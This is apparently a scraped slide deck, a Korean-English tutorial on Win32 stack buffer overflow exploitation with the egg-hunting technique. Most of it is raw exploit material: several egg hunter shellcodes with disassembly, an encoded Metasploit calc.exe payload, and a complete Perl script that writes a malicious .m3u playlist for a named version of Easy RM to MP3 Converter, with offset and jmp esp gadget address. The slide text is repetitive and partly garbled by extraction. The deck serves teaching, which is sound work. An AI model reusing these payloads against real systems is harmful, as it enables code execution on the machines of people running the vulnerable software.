The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Report
Share
Report
Share
1 of 83
Download to read offline
More Related Content
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
1. System Hacking & Reverse Engineering
documented by h2spice
h2spice@gmail.com
[ Buffer Overflow - Egg Hunting ]
2. Who am I
Sanghwan,Ahn (h2spice)
Works for LINE.Corp
Carrying out research on the vulnerability (exploitation,hunt,analysis)
3. 시스템 해킹 / 리버싱
Buffer Overflow
취약점 원리
Stack Overflow
Heap Overflow
Format String Bug
Heap Overflow
Use After Free
Overwriting RET
Overwriting SEH
익스플로잇(Win32/*NIX/ARM)
Egg Hunting
RTL
ROP
Heap Spraying
커리큘럼 소개
취약점 / 악성코드 분석
악성코드 분석
Software on X86
버그 헌팅
X86 ARM
Mobile
취약점 분석
소스코드 분석
퍼징
CVE-XXXX-XXXX
Exploit-DB
Inj3ct0r - 1337day
리버스 엔지니어링
iOS
Android
Overwriting .dtors
Overwriting GOT
4. 목차
커리큘럼 소개
Track3 - Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP
Heap Spray
Track3-2 *NIX
Overwrite RET
RTL
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
RTL
ROP
6. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
7. What is the Egg-Hunting ?
프로세스의 VAS(Virtual Address Space) 검색 기술 이용
공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공할때 유용
(공격자가 프로그램의 흐름을 제어할 수 있다는 전제하에)
Egg Hunting 은 기본적으로 3가지의 코드로 구성
Egg Hunter Code
Marker or Tag
Arbitrary Shell Code
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
8. Track3. Exploitation How to work Egg-Hunter Code ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter Code
x66x81xCAxFFx0Fx42x52x6A
x02x58xCDx2Ex3Cx05x5Ax74
xEFxB8
x77x30x30x74
(marker/tag: w00t)
x8BxFAxAFx75xEAxAFx75xE7
xFFxE7
Marker / Tag
x77x30x30x74x77x30x30x74
(w00tw00t)
Shell Code (Calc)
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x4fx4cx4bx50x4fx42x38x4c
x4bx51x4fx47x50x43x31x4a
9. Track3. Exploitation How to work Egg-Hunter Code ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter Code
x66x81xCAxFFx0Fx42x52x6A
x02x58xCDx2Ex3Cx05x5Ax74
xEFxB8
x77x30x30x74
(marker/tag: w00t)
x8BxFAxAFx75xEAxAFx75xE7
xFFxE7
Marker / Tag
(w00tw00t) +
x77x30x30x74x77x30x30x74
Shell Code (Calc)
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x4fx4cx4bx50x4fx42x38x4c
x4bx51x4fx47x50x43x31x4a
10. Track3. Exploitation How to work Egg-Hunter Code ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter Code
x66x81xCAxFFx0Fx42x52x6A
x02x58xCDx2Ex3Cx05x5Ax74
xEFxB8
x77x30x30x74
(marker/tag: w00t)
x8BxFAxAFx75xEAxAFx75xE7
xFFxE7
Marker / Tag + Shell Code
x77x30x30x74x77x30x30x74
(w00tw00t)
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x4fx4cx4bx50x4fx42x38x4c
x4bx51x4fx47x50x43x31x4a
x4bx51x59x4cx4bx46x54x4c
x4bx43x31x4ax4ex50x31x49
x50x4cx59x4ex4cx4cx44x49
12. Track3. Exploitation How to work Egg-Hunter Code ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter Code
x66x81xCAxFFx0Fx42x52x6A
x02x58xCDx2Ex3Cx05x5Ax74
xEFxB8
x77x30x30x74
(marker/tag: w00t)
x8BxFAxAFx75xEAxAFx75xE7
xFFxE7
Marker / Tag + Shell Code
x77x30x30x74x77x30x30x74
(w00tw00t)
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x4fx4cx4bx50x4fx42x38x4c
x4bx51x4fx47x50x43x31x4a
x4bx51x59x4cx4bx46x54x4c
x4bx43x31x4ax4ex50x31x49
x50x4cx59x4ex4cx4cx44x49
! Search Memory & Find Marker
" Store Marker’s Addr & Jump to there
13. Track3. Exploitation How to work Egg-Hunter Code ?
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter Code
x66x81xCAxFFx0Fx42x52x6A
x02x58xCDx2Ex3Cx05x5Ax74
xEFxB8
x77x30x30x74
(marker/tag: w00t)
x8BxFAxAFx75xEAxAFx75xE7
xFFxE7
" Store Marker’s Addr & Jump to there
Marker / Tag + Shell Code
x77x30x30x74x77x30x30x74
(w00tw00t)
x89xe2xdaxc1xd9x72xf4x58
x50x59x49x49x49x49x43x43
x43x43x43x43x51x5ax56x54
x58x33x30x56x58x34x41x50
x30x41x33x48x48x30x41x30
x30x41x42x41x41x42x54x41
x41x51x32x41x42x32x42x42
x30x42x42x58x50x38x41x43
x4ax4ax49x4bx4cx4ax48x50
x44x43x30x43x30x45x50x4c
x4bx47x35x47x4cx4cx4bx43
x4cx43x35x43x48x45x51x4a
x4fx4cx4bx50x4fx42x38x4c
x4bx51x4fx47x50x43x31x4a
x4bx51x59x4cx4bx46x54x4c
x4bx43x31x4ax4ex50x31x49
x50x4cx59x4ex4cx4cx44x49
! Search Memory & Find Marker
# Execute Shell Code
14. Important in order for Egg-Hunting to work
사용자 입력값으로부터 프로그램의 흐름을 제어
you must be able to jump to (jmp, call, push/ret) & execute some shellcode
Egg-Hunter Code는 예측 가능한 메모리 영역에 위치
egg-hunter code must be available in a predictable location (so you can reliably jump to it & execute it)
Marker/Tag은 고유 식별자여야 하며, 최종 쉘코드 앞에 위치
you must prepend the final shell code with a unique string/marker/tag
메모리 검색에 필요한 기술을 테스트하여 특정 시스템에 가장 적합한 기술을 확인
(IsBadReadPtr,NtDisplayString,NtAccessCheck/AuditAlarm,NtDisplayString/NtAccessChe
ckAndAuditAlarm)
you’ll have to test which technique to search memory works for a particular exploit
버퍼의 크기가 Egg-Hunter Code가 삽입 될 만큼의 최소한 크기가 필요
the amount of available buffer space can be relatively small, because it will only contain the so-called “egg-hunter”
최종 쉘코드는 임의의 메모리 내 위치(Stack/Heap/Etc)
the final shell code must be available somewhere in memory
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
15. Track3. Exploitation Egg-Hunter using SEH injection
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-hunter Code using SEH injection EB21 jmp short 0x23
my $egghunter = "xebx21x59xb8".
"w00t".
“x51x6axffx33xdbx64x89x23".
“x6ax02x59x8bxfbxf3xafx75".
“x07xffxe7x66x81xcbxffx0f".
“x43xebxedxe8xdaxffxffxff".
“x6ax0cx59x8bx04x0cxb1xb8".
“x83x04x08x06x58x83xc4x10".
“x50x33xc0xc3";
59 pop ecx
B890509050 mov eax,0x50905090 ; this is the Marker
51 push ecx
6AFF push byte -0x1
33DB xor ebx,ebx
648923 mov [fs:ebx],esp
6A02 push byte +0x2
59 pop ecx
8BFB mov edi,ebx
F3AF repe scasd
7507 jnz 0x20
FFE7 jmp edi
6681CBFF0F or bx,0xfff
43 inc ebx
EBED jmp short 0x10
E8DAFFFFFF call 0x2
6A0C push byte +0xc
59 pop ecx
8B040C mov eax,[esp+ecx]
B1B8 mov cl,0xb8
83040806 add dword [eax+ecx],byte +0x6
58 pop eax
83C410 add esp,byte+0x10
50 push eax
33C0 xor eax,eax
C3 ret
Egg hunter size = 60 bytes, Egg size = 8 bytes
16. Track3. Exploitation Egg-Hunter using SEH injection
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
EB21 jmp short 0x23
59 pop ecx
B890509050 mov eax,0x50905090 ; this is the Marker
51 push ecx
6AFF push byte -0x1
33DB xor ebx,ebx
648923 mov [fs:ebx],esp
6A02 push byte +0x2
59 pop ecx
8BFB mov edi,ebx
F3AF repe scasd
7507 jnz 0x20
FFE7 jmp edi
6681CBFF0F or bx,0xfff
43 inc ebx
EBED jmp short 0x10
E8DAFFFFFF call 0x2
6A0C push byte +0xc
59 pop ecx
8B040C mov eax,[esp+ecx]
B1B8 mov cl,0xb8
83040806 add dword [eax+ecx],byte +0x6
58 pop eax
83C410 add esp,byte+0x10
50 push eax
33C0 xor eax,eax
C3 ret
Egg-hunter Code using SEH injection ! Move marker to EAX
Egg hunter size = 60 bytes, Egg size = 8 bytes
my $egghunter = "xebx21x59xb8".
"w00t".
“x51x6axffx33xdbx64x89x23".
“x6ax02x59x8bxfbxf3xafx75".
“x07xffxe7x66x81xcbxffx0f".
“x43xebxedxe8xdaxffxffxff".
“x6ax0cx59x8bx04x0cxb1xb8".
“x83x04x08x06x58x83xc4x10".
“x50x33xc0xc3";
" Repeat until find the Marker
17. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using IsBadReadPtr
Egg-hunter Code using IsBadReadPtr
my $egghunter = “x33xdbx66x81".
"xcbxffx0fx43x6ax08x53xb8".
"x0dx5bxe7x77xffxd0x85xc0".
"x75xecxb8".
"w00t".
“x8bxfbxafx75xe7xafx75xe4".
"xffxe7";
33DB xor ebx,ebx
6681CBFF0F or bx,0xfff
43 inc ebx
6A08 push byte +0x8
53 push ebx
B80D5BE777 mov eax,0x77e75b0d
FFD0 call eax
85C0 test eax,eax
75EC jnz 0x2
B890509050 mov eax,0x50905090 ; this is the Marker
8BFB mov edi,ebx
AF scasd
75E7 jnz 0x7
AF scasd
75E4 jnz0x7
FFE7 jmp edi
Egg hunter size = 37 bytes, Egg size = 8 bytes
18. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using IsBadReadPtr
33DB xor ebx,ebx
6681CBFF0F or bx,0xfff
43 inc ebx
6A08 push byte +0x8
53 push ebx
B80D5BE777 mov eax,0x77e75b0d
FFD0 call eax
85C0 test eax,eax
75EC jnz 0x2
B890509050 mov eax,0x50905090 ; this is the Marker
8BFB mov edi,ebx
AF scasd
75E7 jnz 0x7
AF scasd
75E4 jnz0x7
FFE7 jmp edi
! Move marker to EAX
" Repeat until find the Marker
Egg hunter size = 37 bytes, Egg size = 8 bytes
Egg-hunter Code using IsBadReadPtr
my $egghunter = “x33xdbx66x81".
"xcbxffx0fx43x6ax08x53xb8".
"x0dx5bxe7x77xffxd0x85xc0".
"x75xecxb8".
"w00t".
“x8bxfbxafx75xe7xafx75xe4".
"xffxe7";
19. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtDisplayString
Egg-hunter Code using NtDisplayString
my $egghunter =
“x66x81xCAxFFx0Fx42x52x6A".
"x43x58xCDx2Ex3Cx05x5Ax74".
"xEFxB8".
"w00t".
“x8BxFAxAFx75xEAxAFx75xE7".
"xFFxE7";
6681CAFF0F or dx,0x0fff
42 inc edx
52 push edx
6A43 push byte +0x43
58 pop eax
CD2E int 0x2e
3C05 cmp al,0x5
5A pop edx
74EF jz 0x0
B890509050 mov eax,0x50905090 ; this is the Marker
8BFA mov edi,edx
AF scasd
75EA jnz 0x5
AF scasd
75E7 jnz 0x5
FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
20. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtDisplayString
6681CAFF0F or dx,0x0fff
42 inc edx
52 push edx
6A43 push byte +0x43
58 pop eax
CD2E int 0x2e
3C05 cmp al,0x5
5A pop edx
74EF jz 0x0
B890509050 mov eax,0x50905090 ; this is the Marker
8BFA mov edi,edx
AF scasd
75EA jnz 0x5
AF scasd
75E7 jnz 0x5
FFE7 jmp edi
! Move marker to EAX
" Repeat until find the Marker
Egg hunter size = 32 bytes, Egg size = 8 bytes
Egg-hunter Code using NtDisplayString
my $egghunter =
“x66x81xCAxFFx0Fx42x52x6A".
"x43x58xCDx2Ex3Cx05x5Ax74".
"xEFxB8".
"w00t".
“x8BxFAxAFx75xEAxAFx75xE7".
"xFFxE7";
21. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
Egg-hunter Code using NtDisplayString
my $egghunter =
“x66x81xCAxFFx0Fx42x52x6A".
"x02x58xCDx2Ex3Cx05x5Ax74".
"xEFxB8".
"w00t".
“x8BxFAxAFx75xEAxAFx75xE7".
"xFFxE7";
6681CAFF0F or dx,0x0fff
42 inc edx
52 push edx
6A02 push byte +0x02
58 pop eax
CD2E int 0x2e
3C05 cmp al,0x5
5A pop edx
74EF jz 0x0
B890509050 mov eax,0x50905090 ; this is the Marker
8BFA mov edi,edx
AF scasd
75EA jnz 0x5
AF scasd
75E7 jnz 0x5
FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
NtDisplayString을 이용한 Egg-Hunter 와 비슷한
형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은
형태를 가지고 있다. NtDisplayString을 사용하는
대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수
있는 접근 위반을 방지하고자,
NtAccessCheckAndAuditAlarm (KiServiceTable
내부의 오프셋 0x02)을 사용한다.
NtAccessCheck에 대한 자세한 내용은 아래 링크 참조
- http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf
- http://xosmos.net/txt/nativapi.html
22. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
Egg-hunter Code using NtDisplayString
my $egghunter =
“x66x81xCAxFFx0Fx42x52x6A".
"x02x58xCDx2Ex3Cx05x5Ax74".
"xEFxB8".
"w00t".
“x8BxFAxAFx75xEAxAFx75xE7".
"xFFxE7";
6681CAFF0F or dx,0x0fff
42 inc edx
52 push edx
6A02 push byte +0x02
58 pop eax
CD2E int 0x2e
3C05 cmp al,0x5
5A pop edx
74EF jz 0x0
B890509050 mov eax,0x50905090 ; this is the Marker
8BFA mov edi,edx
AF scasd
75EA jnz 0x5
AF scasd
75E7 jnz 0x5
FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
NtDisplayString을 이용한 Egg-Hunter 와 비슷한
형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은
형태를 가지고 있다. NtDisplayString을 사용하는
대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수
있는 접근 위반을 방지하고자,
NtAccessCheckAndAuditAlarm (KiServiceTable
내부의 오프셋 0x02)을 사용한다.
NtAccessCheck에 대한 자세한 내용은 아래 링크 참조
- http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf
- http://xosmos.net/txt/nativapi.html
! Move marker to EAX
" Repeat until find the Marker
23. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
24. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
! 메모리 검색을 시작할 위치 지정
25. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
" 다음 메모리 검색을 위해 주소 값을 증가
26. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
# 현재 가리키고 있는 주소값을 스택에 저장
27. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
$ NtAccessCheckAndAuditAlarm을 위해
0x2 를 EAX 삽입(syscall 인자) 후 syscall 호출
28. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
% 접근 위반(ACCESS_VIOLATION)이 발생했는지 확인
29. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
& EDX 값 복구
30. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
' 접근위반 발생시 시작점(0x12cd6c)로 이구동
31. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
( Marker 삽입
검색대상주소(EDX)를 EDI에 저장
Marker(EAX) 와 검색대상주소(EDI) 비교
32. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
) Marker 미 발견시 시작점(0x12cd6c)로 이동
33. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
Marker 발견시 해당 지점으로 이동
Final Shellcode
34. Exercise Time :D
Target Info
Win32
Easy RM to MP3 Converter
v.2.7.3.700
Download Link is
(http://outofcontrol.co.kr/vulnApp/EasyRM.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
35. Exercise Time :D
Tip
Generate Pattern by using mona plugin
(!mona pattern_create 30000)
nop sleds (0x90 * N)
Shell code (windows/exec calc.exe)
"xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
36. Exercise Time :D
Exploit Info
.m3u Playlist File Format
length of junk data is 26039
gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROOriePn t(Rede turn Programming)
37. Exercise Time :D
Exploit Code (EggHuntingExploit.pl)
my $file= "EggHuntingExploit.m3u";
my $junk= "A" x 26039;
my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "x90" x 25;
my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"x77x30x30x74". # this is the marker/tag: w00t
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = $padding . "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";
open($FILE,">$file");
print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode;
close($FILE);
print "m3u File Created successfullyn";
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROOriePn( tRede turn Programming)
